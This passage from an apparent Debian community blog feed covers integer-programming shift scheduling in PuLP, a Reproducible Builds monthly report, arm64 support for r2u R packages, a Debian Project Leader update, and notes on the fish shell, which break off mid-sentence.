---- SAWING 2:00 PM - 9:00 PM (JUDY REFUSED) BOB (PREFERRED)
---- PAINTING 2:00 PM - 9:00 PM (JUDY REFUSED) HEIDI (NEUTRAL)
SATURDAY (JUDY OFF)
---- SAWING 7:30 AM - 2:30 PM (JUDY REFUSED) CAROL (PREFERRED)
---- PAINTING 7:30 AM - 2:30 PM (JUDY REFUSED) IVAN (PREFERRED)
---- SANDING 9:45 AM - 4:45 PM (JUDY REFUSED) DAVID (PREFERRED)
---- PAINTING 12:00 PM - 7:00 PM (JUDY DISFAVORED) FRANK (NEUTRAL)
---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED) ALICE (PREFERRED)
---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED) BOB (NEUTRAL)
SUMMARY
-- ALICE benefit: 13.000 3 PREFERRED 2 NEUTRAL 0 DISFAVORED
-- BOB benefit: 14.000 4 PREFERRED 1 NEUTRAL 0 DISFAVORED
-- CAROL benefit: 9.000 3 PREFERRED 0 NEUTRAL 0 DISFAVORED
-- DAVID benefit: 15.000 5 PREFERRED 0 NEUTRAL 0 DISFAVORED
-- EVE benefit: 9.000 3 PREFERRED 0 NEUTRAL 0 DISFAVORED
-- FRANK benefit: 13.000 3 PREFERRED 2 NEUTRAL 0 DISFAVORED
-- GRACE benefit: 8.000 2 PREFERRED 1 NEUTRAL 0 DISFAVORED
-- HEIDI benefit: 9.000 1 PREFERRED 3 NEUTRAL 0 DISFAVORED
-- IVAN benefit: 12.000 4 PREFERRED 0 NEUTRAL 0 DISFAVORED
-- JUDY benefit: 6.000 2 PREFERRED 0 NEUTRAL 0 DISFAVORED
This tells us that on Monday Judy does not work, although she marked the SAWING shift as PREFERRED. Instead David got that shift. What would happen if David gave that shift to Judy? He would lose 3 points, she would gain 3 points, and the total would remain exactly the same at 108.
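The degeneracy is easy to check with a little arithmetic, using the benefit values from the solver summary above:

```python
# Benefits from the solver summary above. Moving one PREFERRED shift
# (worth 3 points) from David to Judy moves points between them but
# leaves the linear objective unchanged.
before = {"DAVID": 15.0, "JUDY": 6.0}
after  = {"DAVID": before["DAVID"] - 3.0,
          "JUDY":  before["JUDY"]  + 3.0}
print(sum(before.values()) == sum(after.values()))  # True
```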
How would we favor a more even distribution? We need some sort of tie-break. I
want to add a nonlinearity to strongly disfavor people getting a low number of
shifts. But PuLP is very explicitly a linear programming solver, and cannot
solve nonlinear problems. Here we can get around this by enumerating each
specific case, and assigning it a nonlinear benefit function. The most obvious
approach is to define another set of boolean variables:
vars_Nshifts[human][N]
. We can then use them to add extra benefit terms, with values nonlinearly related to Nshifts. Something like this:
benefit_boost_Nshifts = \
    {2: -0.8,
     3: -0.5,
     4: -0.3,
     5: -0.2}
for h in humans:
    benefits[h] = \
        ... + \
        pulp.lpSum([vars_Nshifts[h][n] * benefit_boost_Nshifts[n] \
                    for n in benefit_boost_Nshifts.keys()])
So in the previous example we considered giving David's 5th shift to Judy, as her 3rd shift. In that scenario, David's extra benefit would change from -0.2 to -0.3 (a shift of -0.1), while Judy's would change from -0.8 to -0.5 (a shift of +0.3). So balancing out the shifts in this way would work: the solver would favor the solution with the higher benefit function.
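The arithmetic for that swap can be checked directly (a small sketch using just the boost table above):

```python
benefit_boost_Nshifts = {2: -0.8, 3: -0.5, 4: -0.3, 5: -0.2}

# David drops from 5 shifts to 4; Judy climbs from 2 shifts to 3.
delta_david = benefit_boost_Nshifts[4] - benefit_boost_Nshifts[5]  # -0.1
delta_judy  = benefit_boost_Nshifts[3] - benefit_boost_Nshifts[2]  # +0.3

# The swap nets +0.2 benefit points, so the solver now prefers it.
print(round(delta_david + delta_judy, 10))  # 0.2
```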
Great. In order for this to work, we need the vars_Nshifts[human][N]
variables
to function as intended: they need to be binary indicators of whether a specific
person has that many shifts or not. That would need to be implemented with
constraints. Let's plot it like this:
#!/usr/bin/python3

import numpy as np
import gnuplotlib as gp

Nshifts_eq  = 4
Nshifts_max = 10

Nshifts = np.arange(Nshifts_max+1)

i0 = np.nonzero(Nshifts != Nshifts_eq)[0]
i1 = np.nonzero(Nshifts == Nshifts_eq)[0]

gp.plot( # True value: var_Nshifts4==0, Nshifts!=4
         ( np.zeros(i0.shape),
           Nshifts[i0],
           dict(_with = 'points pt 7 ps 1 lc "red"') ),
         # True value: var_Nshifts4==1, Nshifts==4
         ( np.ones(i1.shape),
           Nshifts[i1],
           dict(_with = 'points pt 7 ps 1 lc "red"') ),
         # False value: var_Nshifts4==1, Nshifts!=4
         ( np.ones(i0.shape),
           Nshifts[i0],
           dict(_with = 'points pt 7 ps 1 lc "black"') ),
         # False value: var_Nshifts4==0, Nshifts==4
         ( np.zeros(i1.shape),
           Nshifts[i1],
           dict(_with = 'points pt 7 ps 1 lc "black"') ),
         unset=('grid'),
         _set = (f'xtics ("(Nshifts=={Nshifts_eq}) == 0" 0, "(Nshifts=={Nshifts_eq}) == 1" 1)'),
         _xrange = (-0.1, 1.1),
         ylabel = "Nshifts",
         title = "Nshifts equality variable: not linearly separable",
         hardcopy = "/tmp/scheduling-Nshifts-eq.svg")
So a hypothetical vars_Nshifts[h][4]
variable (plotted on the x axis of this
plot) would need to be defined by a set of linear AND constraints to linearly
separate the true (red) values of this variable from the false (black) values.
As can be seen in this plot, this isn't possible. So this representation does
not work.
How do we fix it? We can use inequality variables instead. I define a different set of variables vars_Nshifts_leq[human][N] that are 1 iff Nshifts <= N. The equality variable from before can be expressed as a difference of these inequality variables:

vars_Nshifts[human][N] = vars_Nshifts_leq[human][N] - vars_Nshifts_leq[human][N-1]
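This identity is easy to sanity-check numerically, independently of PuLP:

```python
Nshifts_max = 10

def leq(nshifts, N):
    """Indicator: 1 iff nshifts <= N."""
    return 1 if nshifts <= N else 0

# The equality indicator is the difference of adjacent inequality
# indicators: (nshifts == N) == (nshifts <= N) - (nshifts <= N-1)
for nshifts in range(Nshifts_max + 1):
    for N in range(1, Nshifts_max + 1):
        eq = 1 if nshifts == N else 0
        assert eq == leq(nshifts, N) - leq(nshifts, N - 1)
print("identity holds")
```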
Can these vars_Nshifts_leq
variables be defined by a set of linear AND
constraints? Yes:
#!/usr/bin/python3

import numpy as np
import numpysane as nps
import gnuplotlib as gp

Nshifts_leq = 4
Nshifts_max = 10

Nshifts = np.arange(Nshifts_max+1)

i0 = np.nonzero(Nshifts >  Nshifts_leq)[0]
i1 = np.nonzero(Nshifts <= Nshifts_leq)[0]

def linear_slope_yintercept(xy0,xy1):
    m = (xy1[1] - xy0[1])/(xy1[0] - xy0[0])
    b = xy1[1] - m * xy1[0]
    return np.array(( m, b ))

x01     = np.arange(2)
x01_one = nps.glue( nps.transpose(x01),
                    np.ones((2,1)),
                    axis=-1)
y_lowerbound = nps.inner(x01_one,
                         linear_slope_yintercept( np.array((0, Nshifts_leq+1)),
                                                  np.array((1, 0)) ))
y_upperbound = nps.inner(x01_one,
                         linear_slope_yintercept( np.array((0, Nshifts_max)),
                                                  np.array((1, Nshifts_leq)) ))
y_lowerbound_check = (1-x01) * (Nshifts_leq+1)
y_upperbound_check = Nshifts_max - x01*(Nshifts_max-Nshifts_leq)

gp.plot( # True value: var_Nshifts_leq4==0, Nshifts>4
         ( np.zeros(i0.shape),
           Nshifts[i0],
           dict(_with = 'points pt 7 ps 1 lc "red"') ),
         # True value: var_Nshifts_leq4==1, Nshifts<=4
         ( np.ones(i1.shape),
           Nshifts[i1],
           dict(_with = 'points pt 7 ps 1 lc "red"') ),
         # False value: var_Nshifts_leq4==1, Nshifts>4
         ( np.ones(i0.shape),
           Nshifts[i0],
           dict(_with = 'points pt 7 ps 1 lc "black"') ),
         # False value: var_Nshifts_leq4==0, Nshifts<=4
         ( np.zeros(i1.shape),
           Nshifts[i1],
           dict(_with = 'points pt 7 ps 1 lc "black"') ),
         ( x01, y_lowerbound, y_upperbound,
           dict( _with = 'filledcurves lc "green"',
                 tuplesize = 3) ),
         ( x01, nps.cat(y_lowerbound_check, y_upperbound_check),
           dict( _with = 'lines lc "green" lw 2',
                 tuplesize = 2) ),
         unset=('grid'),
         _set = (f'xtics ("(Nshifts<={Nshifts_leq}) == 0" 0, "(Nshifts<={Nshifts_leq}) == 1" 1)',
                 'style fill transparent pattern 1'),
         _xrange = (-0.1, 1.1),
         ylabel = "Nshifts",
         title = "Nshifts inequality variable: linearly separable",
         hardcopy = "/tmp/scheduling-Nshifts-leq.svg")
So we can use two linear constraints to make each of these variables work properly. To use these in the benefit function we can use the equality constraint expression from above, or we can use these directly:
# I want to favor people getting more extra shifts at the start to balance
# things out: somebody getting one more shift on their pile shouldn't take
# shifts away from under-utilized people
benefit_boost_leq_bound = \
    {2: .2,
     3: .3,
     4: .4,
     5: .5}

# Constrain vars_Nshifts_leq variables to do the right thing
for h in humans:
    for b in benefit_boost_leq_bound.keys():
        prob += (pulp.lpSum([vars[h][s] for s in shifts.keys()])
                 >= (1 - vars_Nshifts_leq[h][b])*(b+1),
                 f"{h} at least {b} shifts: lower bound")
        prob += (pulp.lpSum([vars[h][s] for s in shifts.keys()])
                 <= Nshifts_max - vars_Nshifts_leq[h][b]*(Nshifts_max-b),
                 f"{h} at least {b} shifts: upper bound")

benefits = dict()
for h in humans:
    benefits[h] = \
        ... + \
        pulp.lpSum([vars_Nshifts_leq[h][b] * benefit_boost_leq_bound[b] \
                    for b in benefit_boost_leq_bound.keys()])
In this scenario, David would get a boost of 0.4 from giving up his 5th shift, while Judy would lose a boost of 0.2 from getting her 3rd, for a net gain of 0.2 benefit points. The exact numbers will need to be adjusted on a case-by-case basis, but this works.
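We can brute-force-verify that this pair of linear constraints really does pin down each indicator variable, in plain Python outside of PuLP:

```python
Nshifts_max = 10

# For each shift count and each bound b, exactly one value of the binary
# variable v should satisfy both linear constraints, and that value must
# equal the indicator (nshifts <= b).
for b in (2, 3, 4, 5):
    for nshifts in range(Nshifts_max + 1):
        feasible = [v for v in (0, 1)
                    if nshifts >= (1 - v) * (b + 1)                      # lower bound
                    and nshifts <= Nshifts_max - v * (Nshifts_max - b)]  # upper bound
        assert feasible == [1 if nshifts <= b else 0]
print("constraints pin down the indicator")
```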
The full program, with this and other extra features is available here.
05 March, 2025 08:02PM by Dima Kogan
Welcome to the second report in 2025 from the Reproducible Builds project. Our monthly reports outline what we’ve been up to over the past month, and highlight items of news from elsewhere in the increasingly-important area of software supply-chain security. As usual, however, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website.
Table of contents:
Similar to last year’s event, there was considerable activity regarding Reproducible Builds at FOSDEM 2025, held on 1st and 2nd February this year in Brussels, Belgium. We count at least four talks related to reproducible builds. (You can also read our news report from last year’s event in which Holger Levsen presented in the main track.)
Jelle van der Waa, Holger Levsen and kpcyrd presented in the Distributions track on A Tale of several distros joining forces for a common goal. In this talk, three developers from two different Linux distributions (Arch Linux and Debian) discuss this goal — which is, of course, reproducible builds. The presenters discuss both what is shared and different between the two efforts, touching on the history and future challenges alike. The slides of this talk are available to view, as is the full video (30m02s). The talk was also discussed on Hacker News.
Zbigniew Jędrzejewski-Szmek presented in the ever-popular Python track on Rewriting .pyc files for fun and reproducibility, i.e. the bytecode files generated by Python in order to speed up module imports: “It’s been known for a while that those are not reproducible: on different architectures, the bytecode for exactly the same sources ends up slightly different.” The slides of this talk are available, as is the full video (28m32s).
In the Nix and NixOS track, Julien Malka presented on the Saturday asking How reproducible is NixOS: “We know that the NixOS ISO image is very close to be perfectly reproducible thanks to reproducible.nixos.org, but there doesn’t exist any monitoring of Nixpkgs as a whole. In this talk I’ll present the findings of a project that evaluated the reproducibility of Nixpkgs as a whole by mass rebuilding packages from revisions between 2017 and 2023 and comparing the results with the NixOS cache.” Unfortunately, no video of the talk is available, but there is a blog and article on the results.
Lastly, Simon Tournier presented in the Open Research track on the confluence of GNU Guix and Software Heritage: Source Code Archiving to the Rescue of Reproducible Deployment. Simon’s talk “describes design and implementation we came up and reports on the archival coverage for package source code with data collected over five years. It opens to some remaining challenges toward a better open and reproducible research.” The slides for the talk are available, as is the full video (23m17s).
Vagrant Cascadian presented at this year’s PyCascades conference, which was held on February 8th and 9th in Portland, OR, USA. PyCascades is a regional instance of PyCon held in the Pacific Northwest. Vagrant’s talk, entitled Re-Py-Ducible Builds, caught the audience’s attention with the following abstract:
Crank your Python best practices up to 11 with Reproducible Builds! This talk will explore Reproducible Builds by highlighting issues identified in Python projects, from the simple to the seemingly inscrutable. Reproducible Builds is basically the crazy idea that when you build something, and you build it again, you get the exact same thing… or even more important, if someone else builds it, they get the exact same thing too.
More info is available on the talk’s page.
On our mailing list last month, Julien Malka, Stefano Zacchiroli and Théo Zimmermann of Télécom Paris’ in-house research laboratory, the Information Processing and Communications Laboratory (LTCI) announced that they had published an article asking the question: Does Functional Package Management Enable Reproducible Builds at Scale? (PDF).
This month, however, Ludovic Courtès followed up to the original announcement on our mailing list mentioning, amongst other things, the Guix Data Service and how it shows the reproducibility of GNU Guix over time, as described in a GNU Guix blog post back in March 2024.
The last few months have seen the introduction of reproduce.debian.net. Announced first at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project.
Powering this work is rebuilderd, our server which monitors the official package repositories of Linux distributions and attempts to reproduce the observed results there. This month, however, Holger Levsen:
Split packages that are not specific to any architecture away from amd64.reproducible.debian.net service into a new all.reproducible.debian.net page.
Increased the number of riscv64
nodes to a total of 4, and added a new amd64
node thanks to IONOS, our sponsor of now 10 years.
Discovered an issue in the Debian build service where some new ‘incoming’ build-dependencies do not end up historically archived.
Uploaded the devscripts
package, incorporating changes from Jochen Sprickerhof to the debrebuild
script — specifically to fix the handling the Rules-Requires-Root
header in Debian source packages.
Uploaded a number of Rust dependencies of rebuilderd (rust-libbz2-rs-sys, rust-actix-web, rust-actix-server, rust-actix-http, rust-actix-web-codegen and rust-time-tz) after they were prepared by kpcyrd.
Jochen Sprickerhof also updated the sbuild package to:

- Rules-Requires-Root.
- --root-owner-group to old versions of dpkg.

… and additionally requested that many Debian packages are rebuilt by the build servers in order to work around bugs found on reproduce.debian.net. […][…][…]
Lastly, kpcyrd has also worked towards getting rebuilderd packaged in NixOS, and Jelle van der Waa picked up the existing pull request for Fedora support within rebuilderd and made it work with the existing Koji rebuilderd script. The server is being packaged for Fedora in an unofficial ‘copr’ repository, and will be in the official repositories once all the dependencies are packaged.
The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:
Andrea Manzini:
- rust-i8n (random HashMap order)
- starship/shadow
Andreas Stieger:
Bernhard M. Wiedemann:
Chris Lamb:
- python-assertpy
- terminaltables3
- acme.sh
- node-svgdotjs-svg.js
- onevpl-intel-gpu
- rocdbgapi
- siege
- pkg-rocm-tools

Christian Goll:
- warewulf4 (embeds CPU core count)

Jay Addison:
Jochen Sprickerhof:
kpcyrd:
Leonidas Spyropoulos:
Robin Candau (Antiz):
- highlight (timestamp)
- arch-wiki-lite (timestamp)
- f3d (timestamp)
- jacktrip (timestamp)
- prometheus (timestamp)

Wolfgang Frisch:
Hongxu Jia:
- go (clear GOROOT for func ldShared when -trimpath is used)

There has been the usual work in various distributions this month, such as:
In Debian, 17 reviews of Debian packages were added, 6 were updated and 8 were removed this month adding to our knowledge about identified issues.
Fedora developers Davide Cavalca and Zbigniew Jędrzejewski-Szmek gave a talk on Reproducible Builds in Fedora (PDF), touching on SRPM-specific issues as well as the current status and future plans.
Thanks to an investment from the Sovereign Tech Agency, the FreeBSD project’s work on unprivileged and reproducible builds continued this month. Notable fixes include:
- pkg (hash ordering)
- makefs (source filesystem inode number leakage)
- FreeBSD base system packages (timestamp)
(timestamp)The Yocto Project has been struggling to upgrade to the latest Go and Rust releases due to reproducibility problems in the newer versions. Hongxu Jia tracked down the issue with Go which meant that the project could upgrade from the 1.22 series to 1.24, with the fix being submitted upstream for review (see above). For Rust, however, the project was significantly behind, but has made recent progress after finally identifying the blocking reproducibility issues. At time of writing, the project is at Rust version 1.82, with patches under review for 1.83 and 1.84 and fixes being discussed with the Rust developers. The project hopes to improve the tests for reproducibility in the Rust project itself in order to try and avoid future regressions.
Yocto continues to maintain its ability to binary reproduce all of the recipes in OpenEmbedded-Core, regardless of the build host distribution or the current build path.
Finally, Douglas DeMaio published an article on the openSUSE blog announcing that the Reproducible-openSUSE (RBOS) Project Hits [Significant] Milestone. In particular:
The Reproducible-openSUSE (RBOS) project, which is a proof-of-concept fork of openSUSE, has reached a significant milestone after demonstrating a usable Linux distribution can be built with 100% bit-identical packages.
This news was also announced on our mailing list by Bernhard M. Wiedemann, who also published another report for openSUSE as well.
diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 288
and 289
to Debian:
- Add asar to DIFFOSCOPE_FAIL_TESTS_ON_MISSING_TOOLS in order to address Debian bug #1095057. […]
- Catch a CalledProcessError when calling html2text. […]

Additionally, Vagrant Cascadian updated diffoscope in GNU Guix to version 287 […][…] and 288 […][…] as well as submitted a patch to update to 289 […]. Vagrant also fixed an issue that was breaking reprotest on Guix […][…].
strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-2
was uploaded to Debian unstable by Holger Levsen.
There were a large number of improvements made to our website this month, including:
Bernhard M. Wiedemann fixed an issue on the Commandments of reproducible builds page, fixing a link to the readdir component of Bernhard’s own Unreproducible Package. […]
Holger Levsen clarified the name of a link to our old Wiki pages on the History page […] and added a number of new links to the Talks & Resources page […][…].
James Addison updated the website’s own README file to document a couple of additional dependencies […][…], and did more work on a future Getting Started guide page […][…].
The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
reproduce.debian.net-related:

- riscv64 architecture nodes and integrate them elsewhere in our infrastructure. […][…]
- riscv64 architecture nodes. […][…][…][…][…]

Debian-related:
FreeBSD-related:
Misc:
In addition:
kpcyrd fixed the /all/api/
API endpoints on reproduce.debian.net by altering the nginx configuration. […]
James Addison updated reproduce.debian.net to display the so-called ‘bad’ reasons hyperlink inline […] and merged the “Categorized issues” links into the “Reproduced builds” column […].
Jochen Sprickerhof also made some reproduce.debian.net-related changes, adding support for detecting a bug in the mmdebstrap
package […] as well as updating some documentation […].
Roland Clobus continued their work on reproducible ‘live’ images for Debian, making changes related to new clustering of jobs in openQA. […]
And finally, both Holger Levsen […][…][…] and Vagrant Cascadian performed significant node maintenance. […][…][…][…][…]
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:
IRC: #reproducible-builds on irc.oftc.net
Mastodon: @reproducible_builds@fosstodon.org
Mailing list: rb-general@lists.reproducible-builds.org
Twitter/X: @ReproBuilds
Welcome to post 46 in the R^4 series!
r2u, introduced less than three years ago in post #37, has become a runaway success. When I last tabulated downloads in early January, we were already at 33 million downloads of binary CRAN packages across the three Ubuntu LTS releases we support. These were exclusively for the ‘amd64’ platform of standard x86_64 CPUs (as made by Intel or AMD). Now we are happy to announce that arm64 support has been added and is available!
The arm64 platform is already popular on (cloud) servers and is being pushed quite actively by the cloud vendors. AWS calls their CPU ‘graviton’, GCS calls it ‘axion’. General servers call the CPU ‘ampere’; on laptops / desktops it is branded ‘snapdragon’ or ‘cortex’ or something else. Apple calls their variant M1, M2, … up to M4 by now (and Linux support exists for the brave; it is less straightforward). What these have in common is a generally more favourable ‘power consumed to ops provided’ ratio. That makes these cheaper to run or rent on cloud providers. And in laptops they tend to last longer on a single charge too.
Distributions such as Debian, Ubuntu, and Fedora have had arm64 support for many years. In fact, the CRAN binaries of R, being made as builds at launchpad.net, have long provided arm64 in Michael’s repo; we now also mirror these to CRAN. Similarly, Docker has long supported arm64 containers. And last but not least, two issue tickets (#40, #55) had asked for this a while back.
Good question. I still do not own any hardware with it, and I have not (yet?) bothered with the qemu-based emulation layer. The real difference maker was the recent availability of GitHub Actions instances of ‘ubuntu-24.04-arm’ (and now apparently also for 22.04).
So I started some simple experiments … which made it clear this was viable.
Great question. As is commonly known, of the (currently) 22.1k CRAN packages, a little under 5k are ‘compiled’. Why does this matter? Because the Linux distributions know what they are doing. The 17k (give or take) packages that do not contain compiled code can be used as-is (!!) on another platform. Debian and Ubuntu call these builds ‘binary: all’ as they work on all platforms ‘as is’. The others go by ‘binary: any’ and will work on ‘any’ platform for which they have been built. So we are looking at roughly 5k new binaries.
As I write this in early March, roughly 4.5k of the 5k have been built. Add the 17.1k ‘binary: all’ packages and we are looking at near-complete coverage!
Pretty complete. Compared to the amd64 side of things, we do not (yet?) have BioConductor support; this may be added. A handful of packages do not compile because their builds seem to assume ‘Linux so must be amd64’ and fail over CPU instructions. Similarly, a few packages want to download binary build blobs (my own Rblpapi among them) but none exist for arm64. Such is life. We will try to fix builds as time permits and report build issues to the respective upstream repos. Help in that endeavour would be most welcome.

But all the big and slow compiles one may care about (hello duckdb, hello arrow, …) are there. Which is pretty exciting!
In GitHub Actions, just pick ubuntu-24.04-arm as the platform, and use the r-ci or r2u-setup actions. A first test yaml exists and worked (though this last version had the arm64 runner commented out again). (And no, arm64 was not faster than amd64. More tests needed.)
For simple tests, Docker. The rocker/r-ubuntu:24.04 container exists for arm64 (see here), and one can add r2u support as is done in this Dockerfile, which is used by the builds and available as eddelbuettel/r2u_build:noble. I will add the standard rocker/r2u:24.04 container (or equally rocker/r2u:noble) in a day or two; I had not realised I wasn’t making them for arm64.
On a real machine such as a cloud instance or a proper installation, just use the standard r2u script for noble aka 24.04 available here.
The key lines are the two lines
echo "deb [arch=amd64,arm64] https://r2u.stat.illinois.edu/ubuntu noble main" \
> /etc/apt/sources.list.d/cranapt.list
# ...
echo "deb [arch=amd64,arm64] https://cloud.r-project.org/bin/linux/ubuntu noble-cran40/" \
> /etc/apt/sources.list.d/cran_r.list
creating the apt entries, which are now arm64-aware.
After that, apt works as usual, and of course r2u works as usual thanks also to bspm, so you can just do, say,
and enjoy the binaries rolling in. So give it a whirl if you have access to such hardware. We look forward to feedback, suggestions, feature requests or bug reports. Let us know how it goes!
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub.
Dear Debian community,
this is bits from DPL for February.
In December, Scott Kitterman announced his retirement from the project. I personally regret this, as I vividly remember his invaluable support during the Debian Med sprint at the start of the COVID-19 pandemic. He even took time off to ensure new packages cleared the queue in under 24 hours. I want to take this opportunity to personally thank Scott for his contributions during that sprint and for all his work in Debian.
With one fewer FTP assistant, I am concerned about the increased workload on the remaining team. I encourage anyone in the Debian community who is interested to consider reaching out to the FTP masters about joining their team.
If you're wondering about the role of the FTP masters, I'd like to share a fellow developer's perspective:
"My read on the FTP masters is:
- In truth, they are the heart of the project.
- They know it.
- They do a fantastic job."
I fully agree and see it as part of my role as DPL to ensure this remains true for Debian's future.
If you're looking for a way to support Debian in a critical role where many developers will deeply appreciate your work, consider reaching out to the team. It's a great opportunity for any Debian Developer to contribute to a key part of the project.
In my Bits from the DPL talk at DebConf24, I announced the Tiny Tasks effort, which I intended to start with a Bug of the Day project. Another idea was an Autopkgtest of the Day, but this has been postponed due to limited time resources; I cannot run both projects in parallel.
The original goal was to provide small, time-bound examples for newcomers. To put it bluntly: in terms of attracting new contributors, it has been a failure so far. My offer to explain individual bug-fixing commits in detail, if needed, received no response, and despite my efforts to encourage questions, none were asked.
However, the project has several positive aspects: experienced developers actively exchange ideas, collaborate on fixing bugs, assess whether packages are worth fixing or should be removed, and work together to find technical solutions for non-trivial problems.
So far, the project has been engaging and rewarding every day, bringing new discoveries and challenges, not just technical but also social. Fortunately, in the vast majority of cases, I receive positive responses and appreciation from maintainers. Even in the few instances where help was declined, it was encouraging to see that in two cases, maintainers used the ping as motivation to work on their packages themselves. This reflects the dedication and high standards of maintainers, whose work is essential to the project's success.
I once used the metaphor that this project is like wandering through a dark basement with a lone flashlight, exploring aimlessly and discovering a wide variety of things that have accumulated over the years. Among them are true marvels with popcon >10,000, ingenious tools, and delightful games that I only recently learned about. There are also some packages whose time may have come to an end, but each of them reflects the dedication and effort of those who maintained them, and that deserves the utmost respect.
Leaving aside the challenge of attracting newcomers, what have we achieved since August 1st last year?
With some goodwill, you can see a slight impact on the trends.debian.net graphs (thank you Lucas for the graphs), but I would never claim that this project alone is responsible for the progress. What I have also observed is the steady stream of daily uploads to the delayed queue, demonstrating the continuous efforts of many contributors. This ongoing work often remains unseen by most-including myself, if not for my regular check-ins on this list. I would like to extend my sincere thanks to everyone pushing fixes there, contributing to the overall quality and progress of Debian's QA efforts.
If you examine the graphs for "Version Control System" and "VCS Hosting" with the goodwill mentioned above, you might notice a positive trend since mid-last year. The "Package Smells" category has also seen reductions in several areas: "no git", "no DEP5 copyright", "compat <9", and "not salsa". I'd also like to acknowledge the NMUers who have been working hard to address the "format != 3.0" issue. Thanks to all their efforts, this specific issue never surfaced in the Bug of the Day effort, but their contributions deserve recognition here.
The experience I gathered in this project taught me a lot and inspired some follow-up ideas that we should discuss at a sprint at DebCamp this year.
Finally, if any newcomer finds this information interesting, I'd be happy to slow down and patiently explain individual steps as needed. All it takes is asking questions on the Matrix channel to turn this into a "teaching by example" session.
By the way, for newcomers who are interested, I used quite a few abbreviations-all of which are explained in the Debian Glossary.
I will join two conferences in March; feel free to talk to me if you spot me there.
FOSSASIA Summit 2025 (March 13-15, Bangkok, Thailand) Schedule: https://eventyay.com/e/4c0e0c27/schedule
Chemnitzer Linux-Tage (March 22-23, Chemnitz, Germany) Schedule: https://chemnitzer.linux-tage.de/2025/de/programm/vortraege
Both events will have a Debian booth; come say hi!
Kind regards Andreas.
03 March, 2025 11:00PM by Andreas Tille
I have been testing fish for a couple months now (this file started on
2025-01-03T23:52:15-0500 according to stat(1)
), and those are my
notes. I suspect people will have Opinions about my comments here. Do
not comment unless you have some Constructive feedback to provide: I
don't want to know if you think I am holding it Wrong. Consider that I
might have used UNIX shells for longer than you have lived.
I'm not sure I'll keep using fish, but so far it's the first shell
that survived heavy use outside of zsh(1)
(unless you count
tcsh(1)
, but that was in another millennium).
My normal shell is bash(1), and it's still the shell I use
everywhere other than my laptop, as I haven't switched on all the
servers I manage, although it has been available since August 2022 on
torproject.org servers. I first got interested in fish because they
ported it to Rust, making it one of the rare shells out there
written in a "safe" and modern programming language, released after an
impressive ~2 years of work with Fish 4.0.
Current directory gets shortened,
~/wikis/anarc.at/software/desktop/wayland
shows up as
~/w/a/s/d/wayland
Autocompletion rocks.
Default prompt rocks. Doesn't seem vulnerable to command injection assaults, at least it doesn't trip on the git-landmine.
It even includes pipe status output, which was a huge pain to implement in bash. It made me realize that if the last command succeeds, we don't see other failures, which is also the case with my current prompt anyway! Signal reporting is better than my bash implementation too.
So far the only modification I have made to the prompt is to add a
printf '\a'
to output a bell.
By default, fish keeps a directory history (separate from the
pushd
stack) that can be navigated with cdh
, prevd
, and
nextd
; dirh
shows the history.
I feel there's visible latency in the prompt creation.
POSIX-style functions (foo() { true }
) are unsupported. Instead,
fish uses whitespace-sensitive definitions like this:
function foo
true
end
This means my (modest) collection of POSIX functions need to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions).
EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful.
Command substitution output is split on newlines, not whitespace. You need to
pipe through string split -n " "
to get the equivalent.
<(cmd)
doesn't exist: they claim you can use cmd | foo -
as a
replacement, but that's not correct: I used <(cmd)
mostly where
foo
does not support -
as a magic character to say 'read from
stdin'.
Documentation is... limited. It seems mostly geared toward the web docs
which are... okay (but I couldn't find out about
~/.config/fish/conf.d
there!), but this is really inconvenient when
you're trying to browse the manual pages. For example, fish thinks
there's a fish_prompt
manual page, according to its own completion
mechanism, but man(1)
cannot find that manual page. I can't find the
manual for the time command (which is actually a keyword!).
Fish renders multi-line commands with newlines. So if your terminal looks like this, say:
anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
... but it's actually one line. When you copy-paste the above in foot(1), it will show up exactly like this, newlines and all:
sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Whereas it should show up like this:
sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Note that this is an issue specific to foot(1); alacritty(1) and gnome-terminal(1) don't suffer from it.
()
is like $()
: it's command substitution, not a
subshell. This is really impractical: I use ( cd foo ; do_something)
all the time to avoid losing the current directory... I guess I'm
supposed to use pushd
for this, but ouch. This wouldn't be so bad if
it was just for cd
though. Clean constructs like this:
( git grep -l '^#!/.*bin/python' ; fdfind .py ) | sort -u
turn into what I find rather horrible:
begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end | sort -u
It... works, but it goes back to "oh dear, now there's a new language again". I only found out about this construct while trying:
{ git grep -l '^#!/.*bin/python' ; fdfind .py } | sort -u
... which fails and suggests using begin
/end
, at which point: why
not just support the curly braces?
FOO=bar
is not allowed. It's actually recognized syntax, but creates
a warning. We're supposed to use set foo bar
instead. This really
feels like a needless divergence from the standard.
Aliases are... peculiar. Typical constructs like alias mv="\mv -i"
don't work because fish treats aliases as a function definition, and
\
is not magical there. This can be worked around by specifying the
full path to the command, with e.g. alias mv="/bin/mv -i"
. Another
problem is trying to override a built-in, which seems completely
impossible. In my case, I like the time(1)
command the way it
is, thank you very much, and fish provides no way to bypass that
